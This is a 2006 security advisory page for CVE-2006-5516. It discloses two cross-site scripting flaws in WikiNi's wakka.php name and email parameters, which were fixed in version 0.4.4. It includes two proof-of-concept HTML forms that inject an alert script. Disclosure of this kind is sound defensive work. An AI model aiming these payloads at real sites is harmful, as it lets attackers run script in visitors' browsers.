WikiNi Multiple Cross Site Scripting Vulnerabilities

2006.10.27

Credit: Raphael HUCK

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-5516

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and the vulns addressed in version 0.4.4.
The name parameter of page wakka.php is not properly sanitized:
<html>
<body>
<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">
<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="name" value=">"><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">
</form>
</body>
</html>
The email parameter of page wakka.php is not properly sanitized:
<html>
<body>
<form method="POST" enctype="application/x-www-form-urlencoded" action="http://www.example.com/wakka.php">
<input type="hidden" name="wiki" value="ParametresUtilisateur">
<input type="hidden" name="action" value="login">
<input type="hidden" name="email" value=">"><script>alert('XSS Vulnerable');</script>"
<input type="submit" value="Submit" name="submit">
</form>
</body>
</html>
Original advisory: http://zone14.free.fr/advisories/6/
--Raphael HUCK

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WikiNi Multiple Cross Site Scripting Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.